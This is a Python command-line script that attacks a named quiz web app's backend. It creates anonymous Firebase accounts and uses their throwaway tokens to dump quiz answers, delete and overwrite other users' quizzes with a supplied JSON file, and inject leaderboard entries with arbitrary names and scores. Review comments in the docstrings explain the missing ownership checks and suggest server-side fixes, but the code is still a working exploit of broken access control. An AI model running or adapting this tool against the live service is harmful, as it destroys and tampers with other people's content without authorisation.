#!/usr/bin/env python3
import sys, os
import argparse
import requests
import json
# Base URL of the quiz backend; every /api/quizzes request in this file is sent here.
ROOT_URI = "https://bestiebackend.herokuapp.com"
# you can find this yourself very easily, it's on the main website...
# Sent as the `key` query parameter of the Identity Toolkit accounts:signUp call
# in get_auth_header(). A key that ships inside a public web client identifies
# the project rather than authenticating a caller, so access control has to be
# enforced by the backend on each request. Left empty in this file.
API_KEY = ""
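def get_auth_header():
    """POST itk_root/accounts:signUp?key=API_KEY

    Signs up a new account whose request body carries nothing but
    ``returnSecureToken`` (no e-mail, no password), which is the Identity
    Toolkit form of an anonymous sign-in, and wraps the returned ``idToken``
    in a bearer ``Authorization`` header.

    Every caller in this file invokes this once per request, so each request
    is made under a freshly created account. Such a token proves only that
    the sign-up call succeeded; it carries no relationship to any existing
    quiz, so a backend that accepts it must still check ownership per object.

    Returns:
        dict: ``{"Authorization": "Bearer <idToken>"}``.

    Raises:
        requests.HTTPError: the sign-up endpoint answered with an error status.
        KeyError: the response JSON has no ``idToken`` field.
    """
    itk_root = "https://identitytoolkit.googleapis.com/v1"
    response = requests.post(itk_root + "/accounts:signUp?key=" + str(API_KEY),
                             headers={"Content-Type": "application/json"},
                             data='{"returnSecureToken":true}',
                             timeout=30)  # a call without a timeout can block forever
    if not response.ok:
        # Only error bodies are echoed: a successful body contains the ID token
        # and refresh token, which should not end up in terminal scrollback or logs.
        print(response.text)
    response.raise_for_status()
    token = response.json()["idToken"]
    header = {
        "Authorization": "Bearer " + str(token)
    }
    return header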
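def get_quiz(quiz):
    """GET /api/quizzes/{quiz}

    Fetches one quiz document using a header from get_auth_header().

    Args:
        quiz: quiz identifier; converted with ``str()`` and appended to the path.

    Returns:
        The parsed JSON document, or ``None`` when the body is not JSON or its
        ``"quiz"`` field is missing or null.
    """
    response = requests.get(ROOT_URI + "/api/quizzes/" + str(quiz),
                            headers=get_auth_header(),
                            timeout=30)
    try:
        parsed = response.json()
    except ValueError:
        # response.content is bytes, and "str" + bytes raises TypeError inside
        # the handler; response.text is the decoded form of the same body.
        print("[!] could not parse output " + response.text)
        return None
    # A JSON body without a "quiz" key (or a non-object body) is treated the
    # same as a null quiz instead of raising KeyError/TypeError.
    if not isinstance(parsed, dict) or parsed.get("quiz") is None:
        return None
    return parsed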
def create_quiz(quiz, body):
    """POST /api/quizzes

    Writes ``str(quiz)`` into ``body["qid"]`` (the caller's dict is modified in
    place), posts the dict as JSON with a header from get_auth_header(), raises
    on an HTTP error status and prints the raw response bytes.

    The ``qid`` is chosen by the client here. NOTE(review): whether the backend
    accepts a client-chosen id for an id that previously belonged to another
    account is not visible in this file; server-assigned ids or an ownership
    check would close that gap.
    """
    body["qid"] = str(quiz)
    endpoint = ROOT_URI + "/api/quizzes"
    result = requests.post(endpoint, json=body, headers=get_auth_header())
    result.raise_for_status()
    print(result.content)
def delete_quiz(quiz):
    """DELETE /api/quizzes/{quiz}

    Sends the delete with a header from get_auth_header() and raises
    ``requests.HTTPError`` on an error status; nothing is returned.

    The token used belongs to an account created moments earlier, so a
    successful delete would mean the backend authorizes on "token is valid"
    rather than "token owner created this quiz" — NOTE(review): the server
    side is not visible here; confirm against the backend's route handler.
    """
    target = f"{ROOT_URI}/api/quizzes/{quiz!s}"
    auth = get_auth_header()
    outcome = requests.delete(target, headers=auth)
    outcome.raise_for_status()
def get_answers(quiz):
    """get_quiz(quiz) -> pretty print JSON

    Prints the whole document returned by get_quiz() with a 4-space indent,
    or a "does not exist" notice when get_quiz() returns ``None``.

    The CLI help calls this "Get answers to the quiz questions", which implies
    the GET response carries the answer data — NOTE(review): the response
    schema is not visible here; if it does, the backend should leave answer
    fields out of what it serves to anyone but the quiz owner.
    """
    document = get_quiz(quiz)
    if document is not None:
        print(json.dumps(document, indent=4))
        return
    print(f"[!] quiz {quiz} does not exist")
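def patch_leaderboard(quiz, nick, score):
    """PATCH /api/quizzes/{quiz}

    Sends an ``answerers`` entry made of a fixed placeholder ``uid``, the given
    name and the given score, using a header from get_auth_header().

    Both ``name`` and ``score`` originate from the caller, not from graded
    answers. NOTE(review): how the backend treats these fields is not visible
    here; a leaderboard that stores a client-supplied score (or a uid that does
    not match the token's subject) has no integrity, so the server should
    compute the score itself and bind the entry to the authenticated uid.

    Args:
        quiz: quiz identifier, appended to the path via ``str()``.
        nick: display name, sent as ``str(nick)``.
        score: sent as ``int(score)``; a non-numeric value raises before any
            request is made.

    Raises:
        requests.HTTPError: the backend answered with an error status.
    """
    body = {
        "answerers": {
            "uid": "AAAAAAAAAAAAAAAAAAAAAAAAAAAA",
            "name": str(nick),
            "score": int(score)
        }
    }
    response = requests.patch(ROOT_URI + "/api/quizzes/" + str(quiz),
                              json=body, headers=get_auth_header(),
                              timeout=30)
    # The response used to be discarded, so a rejected request looked like a
    # success; surface the status the same way create_quiz/delete_quiz do.
    response.raise_for_status()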
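def main(arguments):
    """main logic

    Parses the command line and dispatches to exactly one action:
    ``--answers`` (get_answers), ``--replace`` (delete_quiz then create_quiz
    with the JSON file given by ``--body``) or ``--leaderboard``
    (patch_leaderboard with ``--nick`` and ``--score``).

    Args:
        arguments: argument list without the program name.

    Returns:
        int: 0 after an action ran, 1 on a usage or input error.
    """
    parser = argparse.ArgumentParser(
        description=__doc__,
        formatter_class=argparse.RawDescriptionHelpFormatter)
    parser.add_argument('quiz', help="Quiz ID")
    parser.add_argument('--body', help="JSON body of new quiz", required=False)
    parser.add_argument('--nick', help="Custom nickname", required=False)
    # type=int makes argparse reject a non-numeric score up front instead of
    # letting int() raise deep inside patch_leaderboard.
    parser.add_argument('--score', help="Custom score", required=False, type=int)
    actions = parser.add_mutually_exclusive_group()
    actions.add_argument('--answers', help="Get answers to the quiz questions", action='store_true')
    actions.add_argument('--replace', help="Replace quiz with custom JSON file", action='store_true')
    actions.add_argument('--leaderboard', help="Add a custom entry to the leaderboard", action='store_true')
    args = parser.parse_args(arguments)

    if args.answers:
        get_answers(args.quiz)
    elif args.replace:
        try:
            with open(args.body) as handle:
                body = json.loads(handle.read())
        except (TypeError, OSError, ValueError):
            # TypeError: --body omitted (open(None)); OSError: unreadable file;
            # ValueError: not valid JSON. A bare except would also swallow
            # KeyboardInterrupt and SystemExit.
            print("[!] missing or invalid --body <json file>")
            return 1
        # Two separate requests: if the create fails, the delete has already
        # happened and is not rolled back.
        delete_quiz(args.quiz)
        create_quiz(args.quiz, body)
    elif args.leaderboard:
        if args.nick is None or args.score is None:
            # Without this check a missing --score reached int(None) and
            # ended in an unhandled TypeError.
            print("[!] --leaderboard requires --nick and --score")
            return 1
        patch_leaderboard(args.quiz, args.nick, args.score)
    else:
        parser.print_usage()
        return 1
    return 0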
# Script entry point: hand the CLI arguments (minus the program name) to
# main() and use its return value as the process exit status.
if __name__ == "__main__":
    exit_status = main(sys.argv[1:])
    sys.exit(exit_status)